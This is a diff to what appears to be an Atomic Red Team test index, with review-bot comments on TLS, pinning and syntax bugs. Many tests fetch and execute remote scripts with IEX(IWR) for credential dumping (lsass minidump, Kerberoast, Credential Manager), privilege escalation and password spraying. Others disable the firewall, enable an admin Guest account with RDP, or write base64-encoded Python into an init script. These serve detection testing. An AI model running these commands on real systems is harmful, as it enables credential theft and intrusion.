+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1555\src\T1555-macrocode.txt" -officeProduct "Word" -sub "Extract"
cleanup_command: 'Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction
Ignore
'
name: powershell
+ - name: Dump credentials from Windows Credential Manager With PowerShell [windows
+ Credentials]
+ auto_generated_guid: c89becbe-1758-4e7d-a0f4-97d2188a23e3
+ description: This module will extract the credentials from Windows Credential
+ Manager
+ supported_platforms:
+ - windows
+ executor:
+ name: powershell
+ elevation_required: false
+ command: "IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1'
+ -UseBasicParsing); Get-PasswordVaultCredentials -Force \n"
+ - name: Dump credentials from Windows Credential Manager With PowerShell [web
+ Credentials]
+ auto_generated_guid: 8fd5a296-6772-4766-9991-ff4e92af7240
+ description: This module will extract the credentials from Windows Credential
+ Manager
+ supported_platforms:
+ - windows
+ executor:
+ name: powershell
+ elevation_required: false
+ command: 'IEX (IWR ''https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1''
+ -UseBasicParsing); Get-CredManCreds -Force
+
+'
T1555.003:
technique:
created: '2020-02-12T18:57:36.041Z'
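Review bot: The two new Credential Manager tests at L1117 and L1129 run `IEX (IWR ...)` without first setting `[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12`, although every other remote fetch in this commit gains that line (L1100, L1140 and the later hunks); on hosts still defaulting to older protocols these two tests will fail at the download rather than at the technique. The script URL is pinned to a commit hash, which is good, but its content is executed with no integrity check; the repository already ships `Invoke-WebRequestVerifyHash` (used at L1149), and downloading to a file, verifying, then dot-sourcing would make the remote-code step verifiable. Both descriptions are the identical sentence at L1110 and L1122; naming the vault type in each (Windows credentials vs. web credentials) would make the generated docs and execution logs distinguishable.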
@@ -2247,6 +2339,7 @@ credential-access:
- windows
executor:
command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1 -UseBasicParsing)
Invoke-Kerberoast | fl
name: powershell
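Review bot: The added line at L1140 assigns `Tls12` outright, which replaces the session's existing protocol set rather than extending it, so TLS 1.3 is excluded even on hosts that support it; the same assignment is repeated at L1148, L1155, L1162, L1169, L1182, L1194, L1206 and L1231. An additive form keeps the host defaults while still enabling TLS 1.2: `[Net.ServicePointManager]::SecurityProtocol = [Net.ServicePointManager]::SecurityProtocol -bor [Net.SecurityProtocolType]::Tls12`. `ServicePointManager.SecurityProtocol` is a process-wide static, so if the harness runs several tests in one PowerShell session the setting outlives the command that made it; a one-line comment on the first occurrence would document that.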
@@ -2760,6 +2853,7 @@ credential-access:
'
get_prereq_command: |
$parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip"
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){
Expand-Archive $zippath $parentpath\wce -Force
@@ -2801,6 +2895,7 @@ credential-access:
'
get_prereq_command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
@@ -2855,6 +2950,7 @@ credential-access:
'
get_prereq_command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null
Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe}
executor:
@@ -2909,6 +3005,7 @@ credential-access:
'
get_prereq_command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$url = 'https://github.com/gentilkiwi/mimikatz/releases/latest'
$request = [System.Net.WebRequest]::Create($url)
$response = $request.GetResponse()
@@ -2992,10 +3089,9 @@ credential-access:
supported_platforms:
- windows
executor:
- command: 'IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'');
- get-process lsass | Out-Minidump
-
-'
+ command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump
cleanup_command: 'Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
'
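Review bot: The rewritten command at L1183 still loads Out-Minidump.ps1 from PowerSploit's `master` branch, so the code executed by this test can change without any change to the repository, while the other remote scripts touched in this commit are pinned to a commit hash (L1117, L1232). Pinning the URL to a specific commit (`.../PowerSploit/<commit-sha>/Exfiltration/Out-Minidump.ps1`, value to be chosen by the maintainers) would make the test reproducible and let defenders match the exact script content in their telemetry.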
@@ -3130,10 +3226,9 @@ credential-access:
prereq_command: 'if (Test-Path ''#{xordump_exe}'') {exit 0} else {exit 1}
'
- get_prereq_command: 'Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe"
- -OutFile #{xordump_exe}
-
-'
+ get_prereq_command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
executor:
command: "#{xordump_exe} -out #{output_file} -x 0x41\n"
cleanup_command: 'Remove-Item ${output_file} -ErrorAction Ignore
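Review bot: The commit rewrites this test's `get_prereq_command` (L1193–L1195) but leaves the cleanup at L1198 referencing `${output_file}`, which PowerShell reads as an (undefined) variable rather than the atomic placeholder `#{output_file}`, so the dump written by the executor at L1197 is never removed and `-ErrorAction Ignore` hides the failure. The fix is `cleanup_command: 'Remove-Item #{output_file} -ErrorAction Ignore`. If index.yaml is generated, the correction belongs in the source technique YAML.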
@@ -3944,8 +4039,9 @@ credential-access:
- description: NPPSpy.dll must be available in local temp directory
prereq_command: if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit
1}
- get_prereq_command: Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll
- -OutFile "$env:Temp\NPPSPY.dll"
+ get_prereq_command: |-
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "$env:Temp\NPPSPY.dll"
executor:
command: |-
Copy-Item "$env:Temp\NPPSPY.dll" -Destination "C:\Windows\System32"
@@ -4273,6 +4369,9 @@ credential-access:
echo "1q2w3e4r" >> #{input_file_passwords}
echo "Password!" >> #{input_file_passwords}
@FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL
+ cleanup_command: |-
+ del #{input_file_users}
+ del #{input_file_passwords}
- name: Brute Force Credentials of single domain user via LDAP against domain
controller (NTLM or Kerberos)
auto_generated_guid: c2969434-672b-4ec8-8df0-bbb91f40e250
@@ -4520,11 +4619,9 @@ credential-access:
executor:
name: powershell
elevation_required: false
- command: 'IEX (IWR ''https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb72506b9e2768196c8b6a4b7af63cebc47d88/DomainPasswordSpray.ps1''
- -UseBasicParsing); Invoke-DomainPasswordSpray -Password Spring2017 -Domain
- #{domain} -Force
-
-'
+ command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (IWR 'https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb72506b9e2768196c8b6a4b7af63cebc47d88/DomainPasswordSpray.ps1' -UseBasicParsing); Invoke-DomainPasswordSpray -Password Spring2017 -Domain #{domain} -Force
- name: Password spray all domain users with a single password via LDAP against
domain controller (NTLM or Kerberos)
auto_generated_guid: f14d956a-5b6e-4a93-847f-0c415142f07d
@@ -4839,7 +4936,106 @@ credential-access:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- atomic_tests: []
+ identifier: T1003.007
+ atomic_tests:
+ - name: Dump individual process memory with sh (Local)
+ auto_generated_guid: 7e91138a-8e74-456d-a007-973d67a0bb80
+ description: |
+ Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
+ copy process memory to an external file so it can be searched or exfiltrated later.
+ supported_platforms:
+ - linux
+ input_arguments:
+ output_file:
+ description: Path where captured results will be placed
+ type: Path
+ default: "/tmp/T1003.007.bin"
+ script_path:
+ description: Path to script generating the target process
+ type: Path
+ default: "/tmp/T1003.007.sh"
+ pid_term:
+ description: Unique string to use to identify target process
+ type: String
+ default: T1003.007
+ dependencies:
+ - description: 'Script to launch target process must exist
+
+'
+ prereq_command: |
+ test -f #{script_path}
+ grep "#{pid_term}" #{script_path}
+ get_prereq_command: |
+ echo '#!/bin/sh' > #{script_path}
+ echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
+ executor:
+ name: sh
+ elevation_required: true
+ command: |
+ sh #{script_path}
+ PID=$(pgrep -n -f "#{pid_term}")
+ HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1)
+ MEM_START=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f1))))
+ MEM_STOP=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f2))))
+ MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))
+ dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
+ grep -i "PASS" "#{output_file}"
+ cleanup_command: 'rm -f "#{output_file}"
+
+'
+ - name: Dump individual process memory with Python (Local)
+ auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63
+ description: |
+ Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to
+ copy a process's heap memory to an external file so it can be searched or exfiltrated later.
+ supported_platforms:
+ - linux
+ input_arguments:
+ output_file:
+ description: Path where captured results will be placed
+ type: Path
+ default: "/tmp/T1003.007.bin"
+ script_path:
+ description: Path to script generating the target process
+ type: Path
+ default: "/tmp/T1003.007.sh"
+ python_script:
+ description: Path to script generating the target process
+ type: Path
+ default: PathToAtomicsFolder/T1003.007/src/dump_heap.py
+ pid_term:
+ description: Unique string to use to identify target process
+ type: String
+ default: T1003.007
+ dependencies:
+ - description: 'Script to launch target process must exist
+
+'
+ prereq_command: |
+ test -f #{script_path}
+ grep "#{pid_term}" #{script_path}
+ get_prereq_command: |
+ echo '#!/bin/sh' > #{script_path}
+ echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
+ - description: 'Requires Python
+
+'
+ prereq_command: "(which python || which python3 || which python2)\n"
+ get_prereq_command: 'echo "Python 2.7+ or 3.4+ must be installed"
+
+'
+ executor:
+ name: sh
+ elevation_required: true
+ command: |
+ sh #{script_path}
+ PID=$(pgrep -n -f "#{pid_term}")
+ PYTHON=$(which python || which python3 || which python2)
+ $PYTHON #{python_script} $PID #{output_file}
+ grep -i "PASS" "#{output_file}"
+ cleanup_command: 'rm -f "#{output_file}"
+
+'
T1606.002:
technique:
external_references:
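Review bot: In the first T1003.007 test, `MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))` re-applies the `0x` prefix to values that the two preceding lines already converted to decimal, so the two decimal strings are re-read as hex and the count handed to `dd` does not correspond to the heap mapping; `dd` then tries to read far beyond the heap and stops on a read error after writing what it could. Use `MEM_SIZE=$((MEM_STOP - MEM_START))`. `HEAP_MEM` is also empty when the target has no `[heap]` line in `/proc/$PID/maps`, which turns the `$((0x...))` expansions into arithmetic errors; a guard like `[ -n "$HEAP_MEM" ] || { echo "no heap mapping for $PID"; exit 1; }` gives a clear failure instead. The default `script_path` (`/tmp/T1003.007.sh`) itself contains the default `pid_term`, so `pgrep -n -f "#{pid_term}"` relies on the backgrounded `sh -c` child being the newest match; worth a comment in the description.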
@@ -6735,8 +6931,9 @@ collection:
'
executor:
command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Set-Clipboard -value "Atomic T1115 Test, grab data from clipboard via VBA"
- IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1115\src\T1115-macrocode.txt" -officeProduct "Word" -sub "GetClipboard"
cleanup_command: 'Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt"
-ErrorAction Ignore
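Review bot: The new URL still fetches `Invoke-MalDoc.ps1` from the `master` branch and runs it with `IEX`, so whatever is on that branch at run time executes with the operator's privileges, while the other remote scripts in this change (DomainPasswordSpray, Empire Get-System) are pinned to a commit SHA. Pin this one the same way, `https://raw.githubusercontent.com/redcanaryco/atomic-red-team/<commit>/atomics/T1204.002/src/Invoke-MalDoc.ps1`, or, if the file ships with the atomics folder as the path suggests, dot-source the local copy at `PathToAtomicsFolder\T1204.002\src\Invoke-MalDoc.ps1` and avoid the network fetch entirely. The same unpinned `master` fetch appears in the other Invoke-MalDoc tests in this diff.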
@@ -9155,7 +9352,8 @@ privilege-escalation:
computer starts up various applications and may in fact drive you crazy. A
reliable way to make the message box appear and verify the \nAppInit Dlls
are loading is to start the notepad application. Be sure to run the cleanup
- commands afterwards so you don't keep getting message boxes showing up\n"
+ commands afterwards so you don't keep getting message boxes showing up.\n\nNote:
+ If secure boot is enabled, this technique will not work. https://docs.microsoft.com/en-us/windows/win32/dlls/secure-boot-and-appinit-dlls\n"
supported_platforms:
- windows
input_arguments:
@@ -11235,9 +11433,9 @@ privilege-escalation:
atomic_tests:
- name: Enable Guest account with RDP capability and admin priviliges
auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0
- description: After execution the Default Guest account will be enabled (Active)
- and added to Administrators and Remote Desktop Users Group, and desktop will
- allow multiple RDP connections
+ description: |
+ After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group,
+ and desktop will allow multiple RDP connections.
supported_platforms:
- windows
input_arguments:
@@ -11249,6 +11447,10 @@ privilege-escalation:
description: Specify the guest password
type: String
default: Password123!
+ remove_rdp_access_during_cleanup:
+ description: Set to 1 if you want the cleanup to remove RDP access to machine
+ type: Integer
+ default: 0
executor:
command: |-
net user #{guest_user} /active:yes
@@ -11261,8 +11463,9 @@ privilege-escalation:
net user #{guest_user} /active:no >nul 2>&1
net localgroup administrators #{guest_user} /delete >nul 2>&1
net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1
- reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1
- reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1
+ if #{remove_rdp_access_during_cleanup} NEQ 1 (echo Note: set remove_rdp_access_during_cleanup input argument to disable RDP access during cleanup)
+ if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1)
+ if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1)
name: command_prompt
elevation_required: true
T1078.002:
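Review bot: With the new default of `0`, cleanup no longer touches `fDenyTSConnections`/`AllowTSConnections`, so after cleanup the host still accepts RDP connections even though the Guest account is disabled again; the description (outside this hunk) should state that RDP stays enabled unless `remove_rdp_access_during_cleanup` is set to 1. The cmd conditions `if #{remove_rdp_access_during_cleanup} NEQ 1 (...)` become `if NEQ 1 (...)`, a syntax error, if the argument is supplied empty; quoting both sides, `if "#{remove_rdp_access_during_cleanup}" NEQ "1" (...)`, avoids that. When the value is 1, `reg delete` removes the values rather than restoring the pre-test state; capturing the original values in the executor would let cleanup put them back.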
@@ -15033,7 +15236,8 @@ privilege-escalation:
'
executor:
- command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\"
+ command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
+ (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
-UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\"
-officeProduct \"#{ms_product}\" -sub \"Exploit\"\n"
name: powershell
@@ -15167,7 +15371,8 @@ privilege-escalation:
'
executor:
command: |
- IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute"
name: powershell
- name: Remote Process Injection in LSASS via mimikatz
@@ -15203,6 +15408,7 @@ privilege-escalation:
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
get_prereq_command: |
$mimikatz_path = cmd /c echo #{mimikatz_path}
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
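Review bot: `[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12` replaces the process-wide protocol set instead of adding to it, so on a host where TLS 1.3 is already enabled it is switched off for the remainder of the PowerShell session, including the runner's own later requests. The usual form is `[Net.ServicePointManager]::SecurityProtocol = [Net.ServicePointManager]::SecurityProtocol -bor [Net.SecurityProtocolType]::Tls12`, and the same applies to every TLS12 line added in this change. Separately, `mimikatz_trunk.zip` is expanded with no integrity check; since the release tag is pinned, recording its SHA256 in the test and comparing with `Get-FileHash` before `Expand-Archive` would catch a replaced release asset.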
@@ -15215,6 +15421,7 @@ privilege-escalation:
'
get_prereq_command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null
@@ -16060,7 +16267,8 @@ privilege-escalation:
'
executor:
- command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\"
+ command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
+ (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
-UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\"
-officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n"
name: powershell
@@ -17073,6 +17281,48 @@ privilege-escalation:
rm -rf #{systemd_service_path}/#{systemd_service_file}
systemctl daemon-reload
name: bash
+ - name: Create Systemd Service file, Enable the service , Modify and Reload the
+ service.
+ auto_generated_guid: c35ac4a8-19de-43af-b9f8-755da7e89c89
+ description: "This test creates a systemd service unit file and enables it to
+ autostart on boot. Once service is created and enabled, it also modifies this
+ same service file showcasing both Creation and Modification of system process.
+ \n"
+ supported_platforms:
+ - linux
+ dependencies:
+ - description: 'System must be Ubuntu ,Kali OR CentOS.
+
+'
+ prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat
+ /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i
+ ''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi;
+
+'
+ get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS.
+
+'
+ executor:
+ name: bash
+ elevation_required: true
+ command: "cat > /etc/init.d/T1543.002 << EOF\n#!/bin/bash\n### BEGIN INIT
+ INFO\n# Provides : Atomic Test T1543.002\n# Required-Start: $all\n# Required-Stop
+ : \n# Default-Start: 2 3 4 5\n# Default-Stop: \n# Short Description: Atomic
+ Test for Systemd Service Creation\n### END INIT INFO\npython3 -c \"import
+ os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))\"\nEOF\n\nchmod
+ +x /etc/init.d/T1543.002\nif [ $(cat /etc/os-release | grep -i ID=ubuntu)
+ ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002
+ defaults; elif [ $(cat /etc/os-release | grep -i 'ID=\"centos\"') ]; then
+ chkconfig T1543.002 on ; else echo \"Please run this test on Ubnutu , kali
+ OR centos\" ; fi ;\nsystemctl enable T1543.002\nsystemctl start T1543.002\n\necho
+ \"python3 -c \\\"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\\\"\"
+ | sudo tee -a /etc/init.d/T1543.002\nsystemctl daemon-reload\nsystemctl
+ restart T1543.002\n"
+ cleanup_command: |
+ systemctl stop T1543.002
+ systemctl disable T1543.002
+ rm -rf /etc/init.d/T1543.002
+ systemctl daemon-reload
T1053.006:
technique:
id: attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21
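Review bot: `exit /b 0` and `exit /b 1` in the new `prereq_command` are cmd.exe syntax; under `sh`/`bash`, `exit /b` is rejected as an illegal number and the shell exits non-zero, so the prerequisite check fails on every supported distribution and the test never runs. Use `then exit 0; else exit 1; fi`. The test name and description say a systemd unit file is created, but the executor writes a SysV script to `/etc/init.d/T1543.002` that systemd only picks up through its sysv generator; the description should say so. The cleanup removes the script but not the files under `/tmp` that the base64 payloads appear to write (`/tmp/T1543.002.systemd.service.*`), and `sudo tee -a` inside an `elevation_required: true` test is redundant and fails where `sudo` is absent.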
@@ -17442,8 +17692,9 @@ privilege-escalation:
supported_platforms:
- windows
executor:
- command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1'
- -UseBasicParsing); Get-System -Technique NamedPipe -Verbose
+ command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique NamedPipe -Verbose
name: powershell
elevation_required: true
- name: "`SeDebugPrivilege` token duplication"
@@ -17454,8 +17705,9 @@ privilege-escalation:
supported_platforms:
- windows
executor:
- command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1'
- -UseBasicParsing); Get-System -Technique Token -Verbose
+ command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose
name: powershell
elevation_required: true
T1546.005:
@@ -18861,7 +19113,7 @@ defense-evasion:
command: |
bitsadmin.exe /create #{bits_job_name}
bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}
- bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} ""
+ bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} NULL
bitsadmin.exe /resume #{bits_job_name}
timeout 5
bitsadmin.exe /complete #{bits_job_name}
@@ -20202,7 +20454,8 @@ defense-evasion:
'
executor:
command: |
- IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs"
name: powershell
elevation_required: true
@@ -21404,9 +21657,9 @@ defense-evasion:
atomic_tests:
- name: Enable Guest account with RDP capability and admin priviliges
auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0
- description: After execution the Default Guest account will be enabled (Active)
- and added to Administrators and Remote Desktop Users Group, and desktop will
- allow multiple RDP connections
+ description: |
+ After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group,
+ and desktop will allow multiple RDP connections.
supported_platforms:
- windows
input_arguments:
@@ -21418,6 +21671,10 @@ defense-evasion:
description: Specify the guest password
type: String
default: Password123!
+ remove_rdp_access_during_cleanup:
+ description: Set to 1 if you want the cleanup to remove RDP access to machine
+ type: Integer
+ default: 0
executor:
command: |-
net user #{guest_user} /active:yes
@@ -21430,8 +21687,9 @@ defense-evasion:
net user #{guest_user} /active:no >nul 2>&1
net localgroup administrators #{guest_user} /delete >nul 2>&1
net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1
- reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1
- reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1
+ if #{remove_rdp_access_during_cleanup} NEQ 1 (echo Note: set remove_rdp_access_during_cleanup input argument to disable RDP access during cleanup)
+ if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1)
+ if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1)
name: command_prompt
elevation_required: true
T1578.003:
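Review bot: The new cleanup leaves `fDenyTSConnections`/`AllowTSConnections` as the executor set them whenever `remove_rdp_access_during_cleanup` keeps its default of 0, so the host remains RDP-reachable after cleanup; the test description should state this. `if #{remove_rdp_access_during_cleanup} NEQ 1 (...)` is a cmd syntax error when the argument is empty; quote it as `if "#{remove_rdp_access_during_cleanup}" NEQ "1" (...)`. When it is 1, the values are deleted rather than restored to their pre-test contents.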
@@ -22147,6 +22405,23 @@ defense-evasion:
'
cleanup_command: 'netsh advfirewall set currentprofile state on >nul 2>&1
+'
+ name: command_prompt
+ - name: Disable Microsoft Defender Firewall via Registry
+ auto_generated_guid: afedc8c4-038c-4d82-b3e5-623a95f8a612
+ description: |
+ Disables the Microsoft Defender Firewall for the public profile via registry
+ Caution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile...
+ supported_platforms:
+ - windows
+ executor:
+ command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile"
+ /v "EnableFirewall" /t REG_DWORD /d 0 /f
+
+'
+ cleanup_command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile"
+ /v "EnableFirewall" /t REG_DWORD /d 1 /f
+
'
name: command_prompt
- name: Allow SMB and RDP on Microsoft Defender Firewall
